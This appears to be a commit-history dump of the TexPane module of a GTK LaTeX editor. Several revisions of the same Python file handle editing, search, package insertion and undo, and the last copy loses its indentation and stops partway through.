        self.editorviewer.set_sensitive(False)
        self.editorbuffer.insert(start, newcontent)
        self.editorbuffer.set_modified(False)
        self.editorviewer.set_sensitive(True)
        self.editorbuffer.end_not_undoable_action()
        self.editorbuffer.end_user_action()

    def grab_buffer(self):
        """Grabs content of the buffer and returns it for writing to file."""
        buff = self.editorviewer.get_buffer()
        self.editorviewer.set_sensitive(False)
        start = self.get_iterator(START)
        end = self.get_iterator(END)
        content = buff.get_text(start, end)
        self.editorviewer.set_sensitive(True)
        buff.set_modified(False)
        return content

    def decode_text(self, filename):
        """Reads *filename* and decodes it, falling back from the locale
        encoding to iso-8859-1 and finally ascii (with replacement)."""
        loadfile = open(filename, "r")
        content = loadfile.read()
        encoding = locale.getdefaultlocale()[1]
        try: decoded_content = content.decode(encoding)
        except (UnicodeError, TypeError):
            try: decoded_content = content.decode("iso-8859-1", 'replace')
            except (UnicodeError, TypeError):
                decoded_content = content.decode("ascii", 'replace')
        loadfile.close()
        return decoded_content

    def encode_text(self, text):
        """Encodes *text* for writing, with the same fallback chain as
        decode_text()."""
        encoding = locale.getdefaultlocale()[1]
        try: encoded_content = text.encode(encoding)
        except (UnicodeError, TypeError):
            try: encoded_content = text.encode("iso-8859-1", 'replace')
            except (UnicodeError, TypeError):
                encoded_content = text.encode("ascii", 'replace')
        return encoded_content

    def get_iterator(self, tag, search=1):
        """Returns a buffer iterator object for a known position in the buffer
        or a custom searchstring. The optional argument search determines
        whether iter is placed in front or after the find result"""
        if tag == "START":
            bufferiter = self.editorbuffer.get_start_iter()
        elif tag == "END":
            bufferiter = self.editorbuffer.get_end_iter()
        elif tag == "CURRENT":
            bufferiter = self.editorbuffer.get_iter_at_mark(self.editorbuffer.get_insert())
        else:
            if search == 0:
                # Search backwards from the end of the buffer.
                enditer = self.editorbuffer.get_end_iter()
                bufferiter = gtksourceview2.iter_backward_search \
                    (enditer, tag, flags=0, limit=None)[0]
            else:
                # Search forwards from the start of the buffer.
                startiter = self.editorbuffer.get_start_iter()
                bufferiter = gtksourceview2.iter_forward_search \
                    (startiter, tag, flags=0, limit=None)[0]
        return bufferiter

    def insert_package(self, package):
        """Inserts a \\usepackage{...} line before \\begin{document},
        unless the package is already present in the preamble."""
        start_iter = self.get_iterator(START)
        end_iter = self.get_iterator(BEGIN, 1)
        pkgsearchstr = "{" + package + "}"
        pkginsertstr = "\\usepackage{" + package + "}\n"
        if gtksourceview2.iter_forward_search \
            (start_iter, pkgsearchstr, flags=0, limit=end_iter):
            return
        else:
            self.editorbuffer.begin_not_undoable_action()
            self.editorbuffer.insert(end_iter, pkginsertstr)
            self.editorbuffer.end_not_undoable_action()
            self.set_buffer_changed()

    def insert_bib(self, package):
        """Inserts \\bibliography{...} plus a plain bibliographystyle before
        \\end{document}, unless a bibliography is already declared."""
        start_iter = self.get_iterator(BEGIN)
        end_iter = self.get_iterator("\\end{document}", 0)
        searchstr = "\\bibliography{"
        insertstr = "\\bibliography{" + package + "}{}\n"
        stylestr = "\\bibliographystyle{plain}\n"
        if gtksourceview2.iter_forward_search(start_iter, searchstr, flags=0, limit=end_iter):
            return
        else:
            self.editorbuffer.begin_not_undoable_action()
            self.editorbuffer.insert(end_iter, insertstr + stylestr)
            self.editorbuffer.end_not_undoable_action()
            self.set_buffer_changed()

    def set_selection_textstyle(self, widget):
        """Applies the formatting associated with *widget* to the selection."""
        Formatting.Formatting(widget, self.editorbuffer)
        self.set_buffer_changed()

    def apply_errortags(self, errorline):
        """Highlights *errorline* (1-based) with the error tag, or clears the
        highlight when errorline is None."""
        try: #remove the tag from the table if it is in there
            self.editortags.remove(self.errortag)
        except ValueError: pass
        if errorline is not None: #re-add the tag if an error was found
            self.editortags.add(self.errortag)
            start = self.editorbuffer.get_iter_at_line(errorline-1)
            end = self.editorbuffer.get_iter_at_line(errorline)
            self.editorbuffer.apply_tag(self.errortag, start, end)

    # TODO merge function with apply_errortags (multiple error results soon)
    def apply_searchtags(self, searchresults):
        """Highlights every (start, end) iterator pair in *searchresults*."""
        try:
            self.editortags.remove(self.searchtag)
        except ValueError: pass
        self.editortags.add(self.searchtag)
        for result in searchresults:
            self.editorbuffer.apply_tag(self.searchtag, result[0], result[1])

    def start_search(self, term, backwards, matchcase=0):
        """Searches for *term* from the cursor, highlights all matches and
        moves the cursor to the first one (if any)."""
        if matchcase is False:
            matchcase = (gtksourceview2.SEARCH_CASE_INSENSITIVE)
        if backwards is True:
            self.searchresults = self.search_buffer_backward(term, matchcase)
        else:
            self.searchresults = self.search_buffer_forward(term, matchcase)
        self.apply_searchtags(self.searchresults)
        # BUGFIX: guard against a term with no matches; indexing [0] on an
        # empty result list raised an unhandled IndexError.
        try:
            ins, bound = self.searchresults[0]
            self.editorbuffer.place_cursor(ins)
            #self.editorbuffer.select_range(ins, bound)
            self.editorviewer.scroll_to_iter(ins, 0)
        except IndexError: pass #no searchresults

    def search_buffer_forward(self, term, matchcase):
        """Collects all (start, end) matches of *term* from the cursor to the
        end of the buffer."""
        result_list = []
        begin = self.get_iterator(CURRENT)
        while True:
            result = gtksourceview2.iter_forward_search \
                (begin, term, matchcase, limit=None)
            if result:
                result_list.append((result[0], result[1]))
                begin = result[1]
            else:
                break
        return result_list

    def search_buffer_backward(self, term, matchcase):
        """Collects all (start, end) matches of *term* from the cursor back to
        the start of the buffer."""
        result_list = []
        begin = self.get_iterator(CURRENT)
        while True:
            result = gtksourceview2.iter_backward_search \
                (begin, term, matchcase, limit=None)
            if result:
                result_list.append((result[0], result[1]))
                # BUGFIX: when searching backwards we must continue from the
                # match *start* (result[0]); continuing from the match end
                # re-found the same match and looped forever.
                begin = result[0]
            else:
                break
        return result_list

    def grab_wrapmode(self, textwrap, wordwrap):
        """Maps the two wrap configuration flags onto a gtk wrap mode."""
        if textwrap is False:
            return gtk.WRAP_NONE
        if wordwrap is True:
            return gtk.WRAP_WORD
        else:
            return gtk.WRAP_CHAR

    def set_buffer_changed(self, *args):
        """Records the time of the latest buffer modification."""
        self.textchange = datetime.now()

    def check_buffer_changed(self):
        """Returns True exactly once per recorded change since the last call."""
        if self.prevchange != self.textchange:
            self.prevchange = self.textchange
            return True
        else:
            return False

    def undo_change(self):
        if self.editorviewer.get_buffer().can_undo():
            self.editorviewer.get_buffer().undo()
            self.set_buffer_changed()

    def redo_change(self):
        if self.editorviewer.get_buffer().can_redo():
            self.editorviewer.get_buffer().redo()
            self.set_buffer_changed()
Fixed the backward search loop and added no-result constraints
#!/usr/bin/python
# -*- encoding: utf-8 -*-
# Copyright (c) 2009 Alexander van der Mey <alexvandermey@gmail.com>
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import gtk
import pango
import locale
import gtksourceview2
from datetime import datetime
import Formatting
# Sentinel tags understood by TexPane.get_iterator().
START = "START"
END = "END"
CURRENT = "CURRENT"
# LaTeX markers used to locate the preamble / document body boundary.
BEGIN = "\\begin{document}"
PACKAGES = "\\usepackage{"
class TexPane:
    """LaTeX editor pane built on a gtksourceview2 buffer/view pair.

    Handles filling and grabbing the buffer, encoding-tolerant load/save,
    insertion of \\usepackage and \\bibliography statements, error and
    search-result highlighting, change tracking and undo/redo.
    """

    def __init__(self, config):
        self.editorbuffer = gtksourceview2.Buffer()
        self.editortags = self.editorbuffer.get_tag_table()
        self.manager = gtksourceview2.LanguageManager()
        self.searchresults = []
        self.errortag = gtk.TextTag()
        self.searchtag = gtk.TextTag()
        self.configure_texpane(config)
        # Timestamps compared by check_buffer_changed() to detect edits.
        self.textchange = datetime.now()
        self.prevchange = datetime.now()
        self.check_buffer_changed()
        self.editorviewer.connect("key-press-event", self.set_buffer_changed,)
        self.editorbuffer.set_modified(False)

    def configure_texpane(self, config):
        """Configures the gtksourceview (editor) widget"""
        self.language = self.manager.get_language("latex")
        self.editorbuffer.set_language(self.language)
        self.editorbuffer.set_highlight_matching_brackets(True)
        self.editorbuffer.set_highlight_syntax(True)
        self.editorviewer = gtksourceview2.View(self.editorbuffer)
        self.editorviewer.modify_font(pango.FontDescription("monospace 10"))
        self.editorviewer.set_show_line_numbers(config.get_bool("tex_linenumbers"))
        self.editorviewer.set_highlight_current_line(config.get_bool("tex_highlighting"))
        textwrap = config.get_bool("tex_textwrapping")
        wordwrap = config.get_bool("tex_wordwrapping")
        self.editorviewer.set_wrap_mode(self.grab_wrapmode(textwrap, wordwrap))
        self.errortag.set_property('background', 'red')
        self.errortag.set_property('foreground', 'white')
        self.searchtag.set_property('background', 'yellow')

    def fill_buffer(self, newcontent):
        """Clears the buffer and writes new not-undoable data into it"""
        self.editorbuffer.begin_user_action()
        self.editorbuffer.set_text("")
        self.editorbuffer.begin_not_undoable_action()
        start = self.editorbuffer.get_start_iter()
        # Desensitize the view during insertion so the user cannot type
        # into a half-filled buffer.
        self.editorviewer.set_sensitive(False)
        self.editorbuffer.insert(start, newcontent)
        self.editorbuffer.set_modified(False)
        self.editorviewer.set_sensitive(True)
        self.editorbuffer.end_not_undoable_action()
        self.editorbuffer.end_user_action()

    def grab_buffer(self):
        """Grabs content of the buffer and returns it for writing to file."""
        buff = self.editorviewer.get_buffer()
        self.editorviewer.set_sensitive(False)
        start = self.get_iterator(START)
        end = self.get_iterator(END)
        content = buff.get_text(start, end)
        self.editorviewer.set_sensitive(True)
        buff.set_modified(False)
        return content

    def decode_text(self, filename):
        # Reads the file and decodes it, falling back from the locale
        # encoding to iso-8859-1 and finally ascii (with replacement).
        loadfile = open(filename, "r")
        content = loadfile.read()
        encoding = locale.getdefaultlocale()[1]
        try: decoded_content = content.decode(encoding)
        except (UnicodeError, TypeError):
            try: decoded_content = content.decode("iso-8859-1", 'replace')
            except (UnicodeError, TypeError):
                decoded_content = content.decode("ascii", 'replace')
        loadfile.close()
        return decoded_content

    def encode_text(self, text):
        # Encodes text for writing, with the same fallback chain as
        # decode_text().
        encoding = locale.getdefaultlocale()[1]
        try: encoded_content = text.encode(encoding)
        except (UnicodeError, TypeError):
            try: encoded_content = text.encode("iso-8859-1", 'replace')
            except (UnicodeError, TypeError):
                encoded_content = text.encode("ascii", 'replace')
        return encoded_content

    def get_iterator(self, tag, search=1):
        """Returns a buffer iterator object for a known position in the buffer
        or a custom searchstring. The optional argument search determines
        whether iter is placed in front or after the find result"""
        if tag == "START":
            bufferiter = self.editorbuffer.get_start_iter()
        elif tag == "END":
            bufferiter = self.editorbuffer.get_end_iter()
        elif tag == "CURRENT":
            bufferiter = self.editorbuffer.get_iter_at_mark(self.editorbuffer.get_insert())
        else:
            if search == 0:
                # Search backwards from the end of the buffer.
                enditer = self.editorbuffer.get_end_iter()
                bufferiter = gtksourceview2.iter_backward_search \
                    (enditer, tag, flags=0, limit=None)[0]
            else:
                # Search forwards from the start of the buffer.
                startiter = self.editorbuffer.get_start_iter()
                bufferiter = gtksourceview2.iter_forward_search \
                    (startiter, tag, flags=0, limit=None)[0]
        return bufferiter

    def insert_package(self, package):
        # Inserts a \usepackage line before \begin{document}, unless the
        # package is already present in the preamble.
        start_iter = self.get_iterator(START)
        end_iter = self.get_iterator(BEGIN, 1)
        pkgsearchstr = "{" + package + "}"
        pkginsertstr = "\\usepackage{" + package + "}\n"
        if gtksourceview2.iter_forward_search \
            (start_iter, pkgsearchstr, flags=0, limit=end_iter):
            return
        else:
            self.editorbuffer.begin_not_undoable_action()
            self.editorbuffer.insert(end_iter, pkginsertstr)
            self.editorbuffer.end_not_undoable_action()
            self.set_buffer_changed()

    def insert_bib(self, package):
        # Inserts \bibliography plus a plain bibliographystyle before
        # \end{document}, unless a bibliography is already declared.
        start_iter = self.get_iterator(BEGIN)
        end_iter = self.get_iterator("\\end{document}", 0)
        searchstr = "\\bibliography{"
        insertstr = "\\bibliography{" + package + "}{}\n"
        stylestr = "\\bibliographystyle{plain}\n"
        if gtksourceview2.iter_forward_search(start_iter, searchstr, flags=0, limit=end_iter):
            return
        else:
            self.editorbuffer.begin_not_undoable_action()
            self.editorbuffer.insert(end_iter, insertstr + stylestr)
            self.editorbuffer.end_not_undoable_action()
            self.set_buffer_changed()

    def set_selection_textstyle(self, widget):
        # Applies the formatting associated with the widget to the selection.
        Formatting.Formatting(widget, self.editorbuffer)
        self.set_buffer_changed()

    def apply_errortags(self, errorline):
        # Highlights the given (1-based) line with the error tag, or clears
        # the highlight when errorline is None.
        try: #remove the tag from the table if it is in there
            self.editortags.remove(self.errortag)
        except ValueError: pass
        if errorline is not None: #re-add the tag if an error was found
            self.editortags.add(self.errortag)
            start = self.editorbuffer.get_iter_at_line(errorline-1)
            end = self.editorbuffer.get_iter_at_line(errorline)
            self.editorbuffer.apply_tag(self.errortag, start, end)

    # TODO merge function with apply_errortags (multiple error results soon)
    def apply_searchtags(self, searchresults):
        # Highlights every (start, end) iterator pair in searchresults.
        try:
            self.editortags.remove(self.searchtag)
        except ValueError: pass
        self.editortags.add(self.searchtag)
        for result in searchresults:
            self.editorbuffer.apply_tag(self.searchtag, result[0], result[1])

    def start_search(self, term, backwards, matchcase=0):
        # Searches for term from the cursor, highlights all matches and
        # moves the cursor to the first one (if any).
        self.searchresults = []
        if matchcase is False:
            matchcase = (gtksourceview2.SEARCH_CASE_INSENSITIVE)
        if backwards is True:
            self.searchresults = self.search_buffer_backward(term, matchcase)
        else:
            self.searchresults = self.search_buffer_forward(term, matchcase)
        self.apply_searchtags(self.searchresults)
        try:
            ins, bound = self.searchresults[0]
            self.editorbuffer.place_cursor(ins)
            #self.editorbuffer.select_range(ins, bound)
            self.editorviewer.scroll_to_iter(ins, 0)
        except IndexError: pass #no searchresults

    def search_buffer_forward(self, term, matchcase):
        # Collects all (start, end) matches of term from the cursor to the
        # end of the buffer.
        result_list = []
        begin = self.get_iterator(CURRENT)
        while True:
            result = gtksourceview2.iter_forward_search \
                (begin, term, matchcase, limit=None)
            if result:
                result_list.append((result[0], result[1]))
                begin = result[1]
            else:
                break
        return result_list

    def search_buffer_backward(self, term, matchcase):
        # Collects all (start, end) matches of term from the cursor back to
        # the start of the buffer.
        result_list = []
        begin = self.get_iterator(CURRENT)
        while True:
            result = gtksourceview2.iter_backward_search \
                (begin, term, matchcase, limit=None)
            if result:
                result_list.append((result[0], result[1]))
                # Continue from the match start: backward search must move
                # towards the start of the buffer.
                begin = result[0]
            else:
                break
        return result_list

    def grab_wrapmode(self, textwrap, wordwrap):
        # Maps the two wrap configuration flags onto a gtk wrap mode.
        if textwrap is False:
            return gtk.WRAP_NONE
        if wordwrap is True:
            return gtk.WRAP_WORD
        else:
            return gtk.WRAP_CHAR

    def set_buffer_changed(self, *args):
        # Records the time of the latest buffer modification.
        self.textchange = datetime.now()

    def check_buffer_changed(self):
        # Returns True exactly once per recorded change since the last call.
        if self.prevchange != self.textchange:
            self.prevchange = self.textchange
            return True
        else:
            return False

    def undo_change(self):
        if self.editorviewer.get_buffer().can_undo():
            self.editorviewer.get_buffer().undo()
            self.set_buffer_changed()

    def redo_change(self):
        if self.editorviewer.get_buffer().can_redo():
            self.editorviewer.get_buffer().redo()
            self.set_buffer_changed()
|
#!/usr/bin/python
# -*- encoding: utf-8 -*-
# Copyright (c) 2009 Alexander van der Mey <alexvandermey@gmail.com>
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import gtk
import pango
import locale
import gtksourceview2
from datetime import datetime
import Formatting
# Sentinel tags understood by TexPane.get_iterator().
START = "START"
END = "END"
CURRENT = "CURRENT"
# LaTeX markers used to locate the preamble / document body boundary.
BEGIN = "\\begin{document}"
PACKAGES = "\\usepackage{"
class TexPane:
    """LaTeX editor pane built on a gtksourceview2 buffer/view pair.

    Handles filling and grabbing the buffer, encoding-tolerant load/save,
    insertion of \\usepackage and \\bibliography statements, error and
    search-result highlighting (with whole-word support and result
    navigation), change tracking and undo/redo.
    """

    def __init__(self, config):
        self.editorbuffer = gtksourceview2.Buffer()
        self.editortags = self.editorbuffer.get_tag_table()
        self.manager = gtksourceview2.LanguageManager()
        self.searchresults = []
        # Index into searchresultiters; None until the first search ran
        # (jumpto_searchresult relies on the resulting TypeError).
        self.searchposition = None
        self.errortag = gtk.TextTag()
        self.searchtag = gtk.TextTag()
        self.configure_texpane(config)
        # Timestamps compared by check_buffer_changed() to detect edits.
        self.textchange = datetime.now()
        self.prevchange = datetime.now()
        self.check_buffer_changed()
        self.editorviewer.connect("key-press-event", self.set_buffer_changed,)
        self.editorbuffer.set_modified(False)

    def configure_texpane(self, config):
        """Configures the gtksourceview (editor) widget"""
        self.language = self.manager.get_language("latex")
        self.editorbuffer.set_language(self.language)
        self.editorbuffer.set_highlight_matching_brackets(True)
        self.editorbuffer.set_highlight_syntax(True)
        self.editorviewer = gtksourceview2.View(self.editorbuffer)
        self.editorviewer.modify_font \
            (pango.FontDescription(config.get_value("editor", "font")))
        self.editorviewer.set_show_line_numbers( \
            bool(config.get_value("view", "line_numbers")))
        self.editorviewer.set_highlight_current_line( \
            bool(config.get_value("view", "highlighting")))
        textwrap = config.get_value("view", "textwrapping")
        wordwrap = config.get_value("view", "wordwrapping")
        mode = self.grab_wrapmode(textwrap, wordwrap)
        self.editorviewer.set_wrap_mode(mode)
        self.errortag.set_property('background', 'red')
        self.errortag.set_property('foreground', 'white')
        self.searchtag.set_property('background', 'yellow')

    def fill_buffer(self, newcontent):
        """Clears the buffer and writes new not-undoable data into it"""
        self.editorbuffer.begin_user_action()
        self.editorbuffer.set_text("")
        self.editorbuffer.begin_not_undoable_action()
        start = self.editorbuffer.get_start_iter()
        # Desensitize the view during insertion so the user cannot type
        # into a half-filled buffer.
        self.editorviewer.set_sensitive(False)
        self.editorbuffer.insert(start, newcontent)
        self.editorbuffer.set_modified(False)
        self.editorviewer.set_sensitive(True)
        self.editorbuffer.end_not_undoable_action()
        self.editorbuffer.end_user_action()

    def grab_buffer(self):
        """Grabs content of the buffer and returns it for writing to file."""
        buff = self.editorviewer.get_buffer()
        self.editorviewer.set_sensitive(False)
        start = self.get_iterator(START)
        end = self.get_iterator(END)
        content = buff.get_text(start, end)
        self.editorviewer.set_sensitive(True)
        buff.set_modified(False)
        return content

    def decode_text(self, filename):
        # Reads the file and decodes it, falling back from the locale
        # encoding to iso-8859-1 and finally ascii (with replacement).
        loadfile = open(filename, "r")
        content = loadfile.read()
        encoding = locale.getdefaultlocale()[1]
        try: decoded_content = content.decode(encoding)
        except (UnicodeError, TypeError):
            try: decoded_content = content.decode("iso-8859-1", 'replace')
            except (UnicodeError, TypeError):
                decoded_content = content.decode("ascii", 'replace')
        loadfile.close()
        return decoded_content

    def encode_text(self, text):
        # Encodes text for writing, with the same fallback chain as
        # decode_text().
        encoding = locale.getdefaultlocale()[1]
        try: encoded_content = text.encode(encoding)
        except (UnicodeError, TypeError):
            try: encoded_content = text.encode("iso-8859-1", 'replace')
            except (UnicodeError, TypeError):
                encoded_content = text.encode("ascii", 'replace')
        return encoded_content

    def get_iterator(self, tag, search=1):
        """Returns a buffer iterator object for a known position in the buffer
        or a custom searchstring. The optional argument search determines
        whether iter is placed in front or after the find result"""
        if tag == "START":
            bufferiter = self.editorbuffer.get_start_iter()
        elif tag == "END":
            bufferiter = self.editorbuffer.get_end_iter()
        elif tag == "CURRENT":
            bufferiter = self.editorbuffer.get_iter_at_mark(self.editorbuffer.get_insert())
        else:
            if search == 0:
                # Search backwards from the end of the buffer.
                enditer = self.editorbuffer.get_end_iter()
                bufferiter = gtksourceview2.iter_backward_search \
                    (enditer, tag, flags=0, limit=None)[0]
            else:
                # Search forwards from the start of the buffer.
                startiter = self.editorbuffer.get_start_iter()
                bufferiter = gtksourceview2.iter_forward_search \
                    (startiter, tag, flags=0, limit=None)[0]
        return bufferiter

    def insert_package(self, package):
        # Inserts a \usepackage line before \begin{document}, unless the
        # package is already present in the preamble.
        start_iter = self.get_iterator(START)
        end_iter = self.get_iterator(BEGIN, 1)
        pkgsearchstr = "{" + package + "}"
        pkginsertstr = "\\usepackage{" + package + "}\n"
        if gtksourceview2.iter_forward_search \
            (start_iter, pkgsearchstr, flags=0, limit=end_iter):
            return
        else:
            self.editorbuffer.begin_not_undoable_action()
            self.editorbuffer.insert(end_iter, pkginsertstr)
            self.editorbuffer.end_not_undoable_action()
            self.set_buffer_changed()

    def insert_bib(self, package):
        # Inserts \bibliography plus a plain bibliographystyle before
        # \end{document}, unless a bibliography is already declared.
        start_iter = self.get_iterator(BEGIN)
        end_iter = self.get_iterator("\\end{document}", 0)
        searchstr = "\\bibliography{"
        insertstr = "\\bibliography{" + package + "}{}\n"
        stylestr = "\\bibliographystyle{plain}\n"
        if gtksourceview2.iter_forward_search(start_iter, searchstr, flags=0, limit=end_iter):
            return
        else:
            self.editorbuffer.begin_not_undoable_action()
            self.editorbuffer.insert(end_iter, insertstr + stylestr)
            self.editorbuffer.end_not_undoable_action()
            self.set_buffer_changed()

    def set_selection_textstyle(self, widget):
        # Applies the formatting associated with the widget to the selection.
        Formatting.Formatting(widget, self.editorbuffer)
        self.set_buffer_changed()

    def apply_errortags(self, errorline):
        # Highlights the given (1-based) line with the error tag, or clears
        # the highlight when errorline is None.
        try: #remove the tag from the table if it is in there
            self.editortags.remove(self.errortag)
        except ValueError: pass
        if errorline is not None: #re-add the tag if an error was found
            self.editortags.add(self.errortag)
            start = self.editorbuffer.get_iter_at_line(errorline-1)
            end = self.editorbuffer.get_iter_at_line(errorline)
            self.editorbuffer.apply_tag(self.errortag, start, end)

    # TODO merge function with apply_errortags (multiple error results soon)
    def apply_searchtags(self, searchresults):
        # Highlights all results and resets the navigation state used by
        # jumpto_searchresult().
        try:
            self.searchresultiters = []
            self.searchposition = 0
            self.editortags.remove(self.searchtag)
        except ValueError: pass
        self.editortags.add(self.searchtag)
        for result in searchresults:
            self.searchresultiters.append(result)
            self.editorbuffer.apply_tag(self.searchtag, result[0], result[1])

    def jumpto_searchresult(self, direction):
        # Moves the cursor to the next (+1) or previous (-1) search result.
        # IndexError (past the last result) and TypeError (no search ran
        # yet, searchposition is None) are deliberately ignored.
        try:
            if self.searchposition + direction < 0:
                return False
            ins, bnd = self.searchresultiters[self.searchposition + direction]
            self.editorbuffer.place_cursor(ins)
            self.searchposition = self.searchposition + direction
        except (IndexError, TypeError): pass

    def start_search(self, term, backwards, wholeword, matchcase=0):
        # Searches for term from the cursor, highlights all matches and
        # moves the cursor to the first one (if any).
        self.searchresults = []
        if matchcase is False:
            matchcase = (gtksourceview2.SEARCH_CASE_INSENSITIVE)
        if backwards is True:
            self.searchresults = self.search_buffer_backward(term, wholeword, matchcase)
        else:
            self.searchresults = self.search_buffer_forward(term, wholeword, matchcase)
        self.apply_searchtags(self.searchresults)
        try:
            ins, bound = self.searchresults[0]
            self.editorbuffer.place_cursor(ins)
            #self.editorbuffer.select_range(ins, bound)
            self.editorviewer.scroll_to_iter(ins, 0)
        except IndexError: pass #no searchresults

    def search_buffer_forward(self, term, wholeword, matchcase):
        # Collects all (start, end) matches of term from the cursor to the
        # end of the buffer; with wholeword, only word-aligned matches.
        result_list = []
        position = self.get_iterator(CURRENT)
        while True:
            result = gtksourceview2.iter_forward_search \
                (position, term, matchcase, limit=None)
            if result:
                ins, bound = result
                if not wholeword:
                    result_list.append((ins, bound))
                elif wholeword and ins.starts_word() and bound.ends_word():
                    result_list.append((ins, bound))
                else: pass
                position = bound
            else:
                break
        return result_list

    def search_buffer_backward(self, term, wholeword, matchcase):
        # Collects all (start, end) matches of term from the cursor back to
        # the start of the buffer; with wholeword, only word-aligned matches.
        result_list = []
        position = self.get_iterator(CURRENT)
        while True:
            result = gtksourceview2.iter_backward_search \
                (position, term, matchcase, limit=None)
            if result:
                ins, bound = result
                if not wholeword:
                    result_list.append((ins, bound))
                elif wholeword and ins.starts_word() and bound.ends_word():
                    result_list.append((ins, bound))
                else: pass
                # Continue from the match start: backward search must move
                # towards the start of the buffer.
                position = ins
            else:
                break
        return result_list

    def grab_wrapmode(self, textwrap, wordwrap):
        # Maps the two wrap configuration flags onto a gtk wrap mode.
        if textwrap is False:
            return gtk.WRAP_NONE
        elif wordwrap is True:
            return gtk.WRAP_WORD
        else:
            return gtk.WRAP_CHAR

    def set_buffer_changed(self, *args):
        # Records the time of the latest buffer modification.
        self.textchange = datetime.now()

    def check_buffer_changed(self):
        # Returns True exactly once per recorded change since the last call.
        if self.prevchange != self.textchange:
            self.prevchange = self.textchange
            return True
        else:
            return False

    def undo_change(self):
        if self.editorviewer.get_buffer().can_undo():
            self.editorviewer.get_buffer().undo()
            self.set_buffer_changed()

    def redo_change(self):
        if self.editorviewer.get_buffer().can_redo():
            self.editorviewer.get_buffer().redo()
            self.set_buffer_changed()
Temporarily disabled due to a glib problem
git-svn-id: b62a74e6a85b74e782ead772f54cba8e909798b9@287 6e728def-ac18-4b39-bad8-e7d984b3b6fa
#!/usr/bin/python
# -*- encoding: utf-8 -*-
# Copyright (c) 2009 Alexander van der Mey <alexvandermey@gmail.com>
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import gtk
import pango
import locale
import gtksourceview2
from datetime import datetime
import Formatting
# Sentinel tags understood by TexPane.get_iterator().
START = "START"
END = "END"
CURRENT = "CURRENT"
# LaTeX markers used to locate the preamble / document body boundary.
BEGIN = "\\begin{document}"
PACKAGES = "\\usepackage{"
class TexPane:
def __init__(self, config):
self.editorbuffer = gtksourceview2.Buffer()
self.editortags = self.editorbuffer.get_tag_table()
self.manager = gtksourceview2.LanguageManager()
self.searchresults = []
self.searchposition = None
self.errortag = gtk.TextTag()
self.searchtag = gtk.TextTag()
self.configure_texpane(config)
self.textchange = datetime.now()
self.prevchange = datetime.now()
self.check_buffer_changed()
self.editorviewer.connect("key-press-event", self.set_buffer_changed,)
self.editorbuffer.set_modified(False)
def configure_texpane(self, config):
"""Configures the gtksourceview (editor) widget"""
self.language = self.manager.get_language("latex")
self.editorbuffer.set_language(self.language)
self.editorbuffer.set_highlight_matching_brackets(True)
self.editorbuffer.set_highlight_syntax(True)
self.editorviewer = gtksourceview2.View(self.editorbuffer)
self.editorviewer.modify_font \
(pango.FontDescription(config.get_value("editor", "font")))
self.editorviewer.set_show_line_numbers( \
bool(config.get_value("view", "line_numbers")))
self.editorviewer.set_highlight_current_line( \
bool(config.get_value("view", "highlighting")))
textwrap = config.get_value("view", "textwrapping")
wordwrap = config.get_value("view", "wordwrapping")
mode = self.grab_wrapmode(textwrap, wordwrap)
self.editorviewer.set_wrap_mode(mode)
self.errortag.set_property('background', 'red')
self.errortag.set_property('foreground', 'white')
self.searchtag.set_property('background', 'yellow')
def fill_buffer(self, newcontent):
"""Clears the buffer and writes new not-undoable data into it"""
self.editorbuffer.begin_user_action()
self.editorbuffer.set_text("")
self.editorbuffer.begin_not_undoable_action()
start = self.editorbuffer.get_start_iter()
self.editorviewer.set_sensitive(False)
self.editorbuffer.insert(start, newcontent)
self.editorbuffer.set_modified(False)
self.editorviewer.set_sensitive(True)
self.editorbuffer.end_not_undoable_action()
self.editorbuffer.end_user_action()
def grab_buffer(self):
